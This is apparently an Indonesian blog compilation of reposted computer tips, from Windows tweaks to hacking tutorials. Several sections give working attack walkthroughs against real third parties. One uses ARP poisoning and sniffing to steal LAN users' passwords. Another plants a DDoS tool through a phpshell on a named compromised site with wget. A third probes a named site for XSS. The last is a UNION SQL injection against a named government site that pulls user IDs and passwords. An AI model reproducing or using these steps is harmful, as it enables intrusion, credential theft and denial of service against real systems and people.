TrueTransparency

Saat ini ada banyak sekali software yang dapat digunakan untuk mengganti tampilan Windows, misalnya dengan transformation pack yang pernah di tulis di sini, WindowBlinds, Talisman, dan sebagainya. Salah satu “kelemahan” dari transformation pack adalah seringkali membuat Windows kurang stabil alias sering hang.

Sekarang ada lagi software yang bisa Anda gunakan untuk membuat “beda” Windows Anda, yaitu dengan menggunakan TrueTransparency. Software ini cukup kecil, tidak makan resource yang besar dan yang tidak kalah penting adalah gratis

Kalau Anda pengen mencoba TrueTransparency, Anda bisa download di http://www.crystalxp.net. Untuk tambahan skin baru Anda bisa download di http://browse.deviantart.com.

TrueTransparency tidak dilengkapi dengan installer, jadi untuk menjalankan software ini Anda tinggal mengekstrak file yang sudah Anda download dan klik 2x pada file TrueTransparency.exe.

sumber : http://www.klik-kanan.com

Task Manager Darurat Mengatasi Komputer Hang

Pernahkah mengalami kejadian tiba-tiba komputer hang, tidak ada respond dan kita hanya bisa menggerakkan mouse tanpa bisa menjalankan aplikasi lain ? Bahkan kadang jurus pamungkas “Task Manager” ( Ctrl+Alt+Del ) pun tidak berdaya menghadapi kondisi semacam ini. Sehingga mungkin ujung-ujungnya kita hanya menekan tombol Reset.

Meskipun tombol reset bisa mengatasi, tetapi kadang bisa beresiko kehilangan data, ada fie yang rusak dan sebagainya. Alternatifnya, kita bisa mencoba menggunakan software gratis AntiFreeze.

AntiFreeze mungkin memberikan alternatif terakhir untuk mengatasi kejadian seperti diatas. Kejadian seperti itu bisa disebabkan oleh penggunaan CPU yang berlebihan (hampir 100%) atau penggunaan Memory yang terlalu besar, sehingga kita sama sekali tidak bisa membuka, berpindah atau menutup aplikasi apapun.

Setelah software ini di install, maka untuk mengaktifkan, kita tinggal menggunakan kombinasi tombol keyboard Ctrl+Alt+Win+Home ( Memang kombinasi yang cukup banyak, sampai 4 tombol :) ). Setelah itu AntiFreeze akan tampil fullscreen (satu layar penuh) dan hampir semua aplikasi lainnya akan di hentikan sementara (sleep) untuk menurunkan penggunaan CPU/Memory.

Ketika AntiFreeze tampil, kita tinggal mematikan process (End Process) aplikasi yang menggunakan CPU sangat besar ( indikasinya terlihat di kolom CPU Time) atau bisa juga penggunaan memory yang berlebihan (Mem Usage). Karena tampilannya menunya mirip Task Manager, seharusnya kita tidak akan kesulitan menggunakan software ini.

Keadaan-keadaan dimana AntiFreeze bisa digunakan, yaitu :

* Ada satu atau lebih aplikasi yang berjalan sangat intensif, menggunakan hampir seluruh proses CPU, sehingga sistem tidak responsif.
* ADa satu atau lebih aplikasi yang menggunakan Memory sangat besar (berlebihan) termasuk swaping file, sehingga membebani sistem.
* Ada Aplikasi yang dijalankan dengan prioritas sangat tinggi, sehingga menggunakan semua proses CPU (processor)
* Banyak program yang berjalan bersama-sama dan masing-masing ingin mendapatkan “perhatian/jatah” dari Processor.

Meskipun Demikian, terkadang AntiFreeze tidak berhasil atau tidak berjalan untuk kondisi-kondisi tertentu. Misalnya Komputer hang karena masalah hardware, seperti Memory(RAM) yang rusak, bad sector pada Hardisk dan sejenisnya (dan biasanya ditandai dengan Mouse Cursor yang tidak aktif /tidak bisa digerakkann ). Selain itu AntiFreeze juga mungkin tidak akan berhasil jika Aplikasi mempunyai prioritas yang lebih tinggi dari AntiFreeze.

Download AntiFreeze (814 KB), Informasi selengkapnya tentang AntiFReeze disini

http://www.resplendence.com/antifreeze (ebsoft.web.id)

sumber : http://ebsoft.web.id

Tips Format Flashdisk dengan File system NTFS

Sebagian kita mungkin jarang memperhatikan tipe file sistem yang digunakan Flashdisk kita, apakah itu NTFS, FAT32 atau FAT. Untuk mengetahui file sistem yang digunakan, klik kanan Flashdisk di Windows Explorer dan pilih Properties. Di sana terlihat tipe File System yang digunakan.

Tetapi ketika kita akan mencoba mem-format melalui windows Explorer, mungkin disana tidak ada menu NTFS, adanya hanya FAT32 dan FAT. Bagaimana cara mem-format NTFS dan apa bedanya dengan FAT32 dan juga FAT ?

NTFSmerupakan format file system Windows terbaru setelah FAT32, dan mempunyai beberapa kelebihan seperti kemampuan menyimpan tambahan informasi mengenai file/folder (metadata), fitur keamanan, kompresi data, struktur yang lebih baik dan lainnya.

Selain itu, tipe NTFS bisa digunakan untuk mem-format ukuran yang lebih besar, Untuk FAT hanya 2 GB, FAT32 8 TB ( 8.000 GB), sedangkan NTFS bisa sampai 16 EB ( 16 juta TB ). Meskipun demikian, tetap saja NTFS ada kekurangannya, seperti tidak terbaca di Win9x dan proses baca tulis ke disk yang lebih sering.

Karena tiap file/folder menyimpan informasi yang lebih banyak (metadata), maka proses baca tulis tiap file/folder akan lebih sering daripada tipe FAT32 atau FAT, sehingga untuk flashdisk, mempengaruhi umur (daya tahan). Mengingat Memory Flashdisk mempunyai batasan baca tulis. ( artikel tentang menjaga flashdisk agar lebih awet bisa dibaca disini : Karakteristik dan Tips menjaga Flashdisk lebih awet )

Mengaktifkan format NTFS di Windows Explorer

Bisa saja kita mem-format USB Flashdisk dengan tipe NTFS dengan bantuan HP USB Format ToolsHP USB Format Tools. Tetapi sebenarnya Windows Explorer bisa melakukannya. Untuk mengaktifkannya bisa diikuti langkah berikut

1. Buka System Properties dengan cara Klik kanan My Computer > Properties (atau dengan tombol Keyboard Win + Break )
2. Buka tab Hardware kemudian klik tombol Device Manager
3. Pilih Disk Drive dan pilih Flashdisk yang ingin di format dengan NTFS, klik kanan, pilih Properties.
4. Setelah terbuka pilih Tab Policies
5. Pilih Optimize for performance dan klik OK


6. Setelah itu coba klik kanan Drive flashdisk di windows Explorer dan pilih menu Format, maka disana seharusnya sudah muncul File System NTFS.

Yang perlu diperhatikan adalah ketika opsi ini diaktifkan, setiap mencabut flashdisk harus selalu melalui Safety Remove Hardware. Jika pilihan adalah “Optimize for quick removal” maka sebenarnya flashdisk bisa langsung dilepas, tanpa Safety Remove hardware

Test antara NTFS, FAT32 dan FAT

Saya telah mencoba beberapa perbandingan (terutama proses meng-copy data) dengan tipe yang berbeda-beda, dan hasilnya sebagai berikut :

* Copy 11 file (ukuran masing-masing sekitar 170 MB) total sekitar 1.8 GB
NTFS 04:44 ( 4 menit 46 detik )
FAT32 05:09 ( 5 menit 9 detik)
FAT 04:46 ( 4 menit 46 detik)
* Copy 1.297 files (ukuran antara 1 KB sampai 23 KB) dengan total 8,23 MB
NTFS 29 detik
FAT32 56 detik
FAT 58 detik
* Kapasitas setelah di Format
NTFS 2.038.044.672 bytes Used space 12.937.216 bytes (12.3 MB)
FAT32 2.046.959.616 bytes Used space 4.096 bytes (4.00 KB)
FAT 2.050.686.976 bytes Used Space 0 bytes

Terlihat proses copy data dengan NTFS, relatif lebih cepat, tetapi ukuran setelah di format sedikit lebih kecil karena memang diperlukan space tambahan yang lebih besar untuk informasi file/folder (metadata). Jika flashdisk sering digunakan untuk proses baca tulis dan tidak begitu memerlukan fitur-fitur NTFS, seperti keamanan data, maka memilih tipe FAT32 mungkin akan lebih baik.

Artikel berikutnya insyaAllah akan membahas tentang memanfaatkan tipe NTFS untuk melindungi Flahsdisk dari Virus yang akan membuat, menghapus atau memodifikasi Autorun.inf dengan program sederhana yang saya buat “Super Autorun”.

sumber : http://ebsoft.web.id

Tips Remove AVG untuk Install Kaspersky

Untuk para pengguna Anti Virus yang ingin menggantinya dengan Kaspersky Anti Virus, biasanya akan mendapatkan sedikit masalah pada proses installisasi Kaspersky. Proses instal tidak dapat berjalan karena akan muncul pesan “incompatible software - installed error” .

Hal ini terjadi karena Anti Virus AVG yang sebelumnya anda gunakan telah mempunyai dan membuat data Registry. Dan ketika anda meremove/uninstall melalui Control Panel maka Data Registry ini belum terhapus.

Untuk mengatasi masalah ini anda dapat melakukannya dengan menggunakan software seperti CCleaner ataupun TuneUp Utilities 2009. Atau juga dapat melakukannya melalui cara manual melalui Registry Editor.

Dengan cara manual dibawah ini kita bisa menghapus entry registry AVG sebelumnya, sehingga nantinya kita bisa menginstall Kaspersky Anti Virus 2009.

Pertama anda buka start menu -> run lalu ketikkan -> regedit -> enter . Pada halaman Registry Editor, arahkan pada entri yang saya sebutkan dibawah ini ;

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG7Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG6INSTALL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG8Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\AVG\Avg8

Klik kanan pada entri tersebut lalu hapus / delete. Jika anda menggunakan 64 bit maka entri yang harus dihapus seperti dibawah ini ;

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AVG7Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AVG6INSTALL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AVG8Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\AVG\Avg8

Setelah anda melakukan seperti petunjuk yang diatas, baru bisa berikutnya anda install Kaspersky Anti Virus 2009. Sebelumnya permasalahan seperti ini sudah pernah ada yang menanyakan melalui pesan komentar dan juga ada beberapa teman yang menjawabnya (avicenna). Jadi dengan tips pada postingan ini akan lebih mudah untuk anda yang mengalami permasalahan seperti ini.

sumber : www.d60pc.com

Backtack 4

untuk backtrack 4 beta bisa di download disini

Backtrack 4 beta

md5 checksum : 7d1eb7f4748759e9735fee1b8a17c1d8

Backtrack 4 beta

md5 checksum : 38acdcbaf6c73d7c55180dfea8641e5d

Seminar Securty System dan Live Demo Hacking 2009

Seminar Securty System dan Live Demo Hacking 2009

sabtu & maret pukul 09.00 s.d 16.00 WIB
tempat aula kampus STMIK"AMIKBANDUNG"

seminar :
\ Wireless Hacking
\ Local Hacking dan cara pengamanannya

Tiket Box :
* pelajar, Mahasiswa : Rp. 30.000,00
* Umum : Rp. 50.000,00

Fasilitas :
+ CD Hacking
+ Coffebreak
+ Sertifikat
+ Doorprize

Registrasi :
Sekertariat SEMA
Senat Mahasiswa STMIK"AMIKBANDUNG"
jln. Jkarta no.28 Bandung Jawa barat

Contact :
# YAnti (08565991432)
# Rosid (02276153456)

Suported By :
+secerehacklink
+yogyafree
+APTIKOM

Hacking via LAN

Cara hacking via LAN

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
Download wireshark
Download Cain & Abel

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)


sumber: http://kwoksundip.wordpress.com/

Percepat Windows

biar windows kenceng larinya dan tidak boros memory

Sebenarnya banyak aplikasi buat tweak XP, baik secara manual maupun meggunakan software. Namun kali ini gw bakal kasih tips buat lo2 pade terutama matiin aplikasi pada service.

Jalankan services.msc (start,run,services.msc)

matikan/disablekan service-2 berikut ini yang tidak berguna
Alerter
Application Layer Gateway Service,
Application Management
Automatic Updates
Background Intelligent Transfer
Clipbook
Distributed Link Tracking Client
Distributed Transaction Coordinater
Error Reporting Service
Fast User Switching Compatibility
IMAPI CD-Burning
Indexing Service
IPSEC Services
Messenger
Net Logon
Net Meeting
Remote Desktop Sharing
Network DDE
Network DDE DSDM
Portable Media Serial Number
Remote Desktop Help Session Manager
Remote Registry
Secondary Logon
Smartcard
SSDP Discovery Service
Telnet Themes
Uninterruptible Power Supply
Universal Plug and Play Device Host
Upload Manager
Webclient
Wireless Zero Configuration
WMI Performance Adapto


sumber: http://kwoksundip.wordpress.com

Serangan DDOS

DDOS LEWAT PHPSHELL

Layanan IP dan TCP yang bekerja di mesin anda adalah termasuk salah satu
celah yang memikat untuk melancarkan serangan DDOS.
Disini papi mau menulis bagaimana memasang senjata buat DDOS.
Tapi ingat jangan sampai disalah gunakan,karena sangat berbahaya.
Terutama jangan buat DDOS warnet karena papi sendiri kerja diwarnet,
Benar-benar nggak enak kalau lagi user ramai eh tau-tau putus karena kena DDOS.

Langsung saja pada pembahasan kali ini papi asumsikan anda semua sudah tahu,
Bagaimana mencari target yang bisa dipasangi PHPSHELL.
Bagi yang belum mengerti silahkan anda baca pada “OLDDATABASE”
Disana sudah banyak tulisan/tutorial yang membahasnya.

Papi ambil contoh dari salah satu target yang telah papi siapkan

http://www.gotvape.com/test/.pomponk/phphsell.php
(Contoh web yang sudah terpasang phpshellnya)

Langkah selanjutnya kita upload senjatanya.

http://www.chrisandkristy.com/galbum/.gallery/vadim

Sekarang kita upload dengan menggunakan command wget.


Gambar PHPSHELL yang akan ditanami senjata(vadim)

Selanjutnya kita lihat apakah senjata/Vadim yang kita upload sudah masuk!!!
Ketikkan command ls –a

total 92
drwxrwxrwx 2 wwwuser www 4096 Apr 30 11:25 .
drwxr-x--x 67 wwwuser www 8192 Apr 30 11:23 ..
-rwxrwxrwx 1 wwwuser www 64973 Dec 4 23:43 index.html
-rw-r--r-- 1 wwwuser www 5686 Aug 24 2005 phpshell.php
-rw-r--r-- 1 wwwuser www 6114 Jul 28 2005 vadim

Nah… ternyata kita berhasil memasukkan senjata/vadim
Kemudian kita kasih command CHMOD

Ketik begini chmod 755 Vadim

Setelah itu anda bisa menggunakannya dengan perintah begini:

./vadim ip port (./vadim 206.xxx.xxx.xxx 53)

Sumber : http://www.acehforum.or.id

Serangan DoS

Serangan DoS (Inggris: denial-of-service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

• Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.


• Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.


• Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).

[sunting] Distributed Denial of Service

Cara kerja serangan Distributed Denial of Service sederhana

Distributed Denial of Service (DDoS) atau Penolakan Layanan secara Terdistribusi adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target di jaringan.

Serangan Denial of Service klasik bersifat "satu lawan satu", sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang asli, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "tidak berguna" bagi klien.

Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang asli dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).

Tidak seperti akibatnya yang menjadikan kerumitan yang sangat tinggi (bagi para administrator jaringan dan server), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

1. Menjalankan tool yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diperoleh secara bebas di Internet.



2. Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".

Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.

Beberapa contoh Serangan DoS lainnya adalah adalah:

• Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistim, misalnya paket ICMP yang berukuran sangat besar.


• Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.


• Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.



• Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.


• ICMP Flooding

sumber : http://id.wikipedia.org

XSS vulnerability

Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=



http://www.malesbanget.com/kamus/definisi.php?kata=

kemudian tekan enter ...
kemudian akan muncul popup baru berisi 'Tes, XSS-nya masih bisa'

sumber: www.ilmuwebsite.com

Teknik dasar sql injection

1. Cari target
Contoh target:
contoh: http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=5


2. Cek lubang dengan menambahkan ' pada url
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=5'

Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe


3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah =
silahkan tambahkan -
jadi urlnya:
http://www.kkppi.go.id/baru/publikasi.php?mode=baca&pub_id=-5

Sekarang silahkan kasi order ampe ketemu error....
Contoh:

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 1/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 2/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 3/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 4/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 5/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 6/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 7/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 8/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 9/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 10/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 11/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 12/*
<----ada error

Maka tersebut punya 11 colom....

4 Sekarang masukkan perintah unoin all select 1,2,3,4,5,6,7,8,9,10,11/* <<<---
serupakan colom yang ada dallam web tersebut contoh:

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,5,6,7,8,9,10,11/*

Maka akan keluar angka , misal angka yang keluar adalah 5 ,Angka yang keluar
pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version
untuk mengecek versi

5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: tb_user ,users/* ,admin/*, members/*, dll
nama colom: user_name , user-d, user_is, login_name, username, password, pass
dll

6. Kita coba liat liat tabel yang ada
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables/*

7. Kita coba liat juga kolom2 nya
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,column_name,6,7,8,9,10,11 from information_schema.columns/*

Udah puas liat liat Hah? Terserah deh di apain

8. Sekarang kita coba berburu user_id nya
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,user_id,6,7,8,9,10,11 from tb_user/*

9.Sekarang coba berburu password nya.....
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,password,6,7,8,9,10,11 from tb_user/*

Acunetix Web Vulnerability scanner 6

